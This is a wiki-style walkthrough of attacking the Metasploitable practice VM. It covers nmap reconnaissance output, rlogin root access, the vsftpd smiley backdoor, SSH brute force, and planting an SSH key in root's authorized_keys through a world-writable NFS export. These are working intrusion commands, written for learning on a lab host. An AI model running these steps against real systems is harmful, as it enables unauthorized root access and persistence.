Revision as of 15:42, 25 March 2016

Metasploitable is a virtualbox fo pentesting practice.

Recon

Make a box for stuff:

$ mkdir -p box/metasploitable

Start by using nmap to scan the host.

First a fast scan -F:

$ nmap -F 10.0.0.*

Then we can do a more extensive scan:

$ nmap -sS 10.0.0.*

This reveals the IP address of the VirtualBox, which is 10.0.0.27.

We can also do a deeper scan:

$ nmap -sS -sV -A 10.0.0.27

This will reveal an array of services, some of which may be exploitable using metasploit.

Sure enough, the verbose scan returns lots of good information:

$ nmap -sS -sV -A 10.0.0.27

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-22 18:30 PDT
Nmap scan report for 10.0.0.27
Host is up (0.016s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2016-03-23T01:31:31+00:00; +33s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      42810/tcp  mountd
|   100005  1,2,3      45599/udp  mountd
|   100021  1,3,4      34385/tcp  nlockmgr
|   100021  1,3,4      60702/udp  nlockmgr
|   100024  1          38085/udp  status
|_  100024  1          52004/tcp  status
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    Java RMI Registry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression
|   Status: Autocommit
|_  Salt: w$K,8vk7k8tagd@PR*zK
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 1:05:20
|   source ident: nmap
|   source host: 6D4CD63B.D3975B40.7B559A54.IP
|_  error: Closing Link: cxfhgnbdt[10.0.0.25] (Quit: cxfhgnbdt)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2016-03-22T21:31:31-04:00

TRACEROUTE
HOP RTT      ADDRESS
1   16.11 ms 10.0.0.27

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds

MySQL

See MSF#MySQL for the MySQL exploits using Metasploit framework.

PostgreSQL

One of the services running on metasploitable is PostgreSQL, so let's continue with the sql theme:

5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7

Metasploitable/PostgreSQL

Rlogin

This one is trivial: ports 512, 513, and 514 are open for "r" servcies. A service has been misconfigured to allow remote access connections from any host.

All you need to do is ask nicely for root!

First, make sure rsh-client is installed, otherwise it will revert to SSH and ask for a password:

# apt-get install rsh-client

Now ask nicely for root:

# rlogin -l root 10.0.0.27
Last login: Tue Mar 22 20:26:16 EDT 2016 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#

This machine is now totally compromised!

VSFTP

The particular version of vsftp that is running on metasploitable contains a malicious backdoor that was slipped into the source code. If the username ends in a smiley :) the ftp server will open a listening shell on port 6200.

Metasploitable/VSFTP

SSH

There are several ways to get into a machine using SSH.

The first is to attempt to log in via brute force, using a tool like hydra. This is the method you would use if you compromised the MySQL or PostgreSQL servers and have access to files on the remote machine - for example, the contents of /etc/passwd, which gives you a list of all users on the system. This would enable you to brute-force passwords for some or all users.

Metasploitable/SSH/Brute Force

Alternatively, if you have access to the filesystem through an exploit such as the rlogin trick above, or through a PHP shell introduced through a web app vulnerability, or through a netcat payload, you can generate an SSH key for the attacker machine, and add it to the list of trusted hosts on the remote machine. This enables you to login without a password. This method requires access to the filesystem, so see other exploits for details.

Copy your public SSH key in ~/.ssh/id_rsa.pub and add it to the Metasploitable Virtual Machine's /root/.ssh/authorized_keys file.

Then you'll be able to log in like this:

# ssh root@10.0.0.27
Last login: Tue Mar 22 20:26:16 EDT 2016 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#

Network File System

(Also see Linux/File Server page for general notes on NFS in Linux.)

Start by checking out what network services are running. Use the rpcinfo command to do that:

# rpcinfo -p 10.0.0.27

This will return information about open ports and RPC services. We can see that there is an NFS service listening on port 2049:

root@morpheus:~# rpcinfo -p 10.0.0.27
   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  38085  status
    100024    1   tcp  52004  status
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100021    1   udp  60702  nlockmgr
    100021    3   udp  60702  nlockmgr
    100021    4   udp  60702  nlockmgr
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100021    1   tcp  34385  nlockmgr
    100021    3   tcp  34385  nlockmgr
    100021    4   tcp  34385  nlockmgr
    100005    1   udp  45599  mountd
    100005    1   tcp  42810  mountd
    100005    2   udp  45599  mountd
    100005    2   tcp  42810  mountd
    100005    3   udp  45599  mountd
    100005    3   tcp  42810  mountd

Now use the showmount command to show what file systems are mountable on this NFS:

root@morpheus:~# showmount -e 10.0.0.27
Export list for 10.0.0.27:
/ *

Woot - the entire filesystem is mountable/writable!

Now to mount the network filesystem, we need to run the RPC service rpcbind.

# service rpcbind start

Now we can mount the filesystem at the IP address, with no credentials:

# mkdir /tmp/r00t
# mount -t nfs 10.0.0.27:/ /tmp/r00t

Now that we have write access to the filesystem, we can copy an SSH key into the remote machine's trusted SSH keys, and obtain passwordless remote access:

# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys

Metasploitable: Difference between revisions

From charlesreid1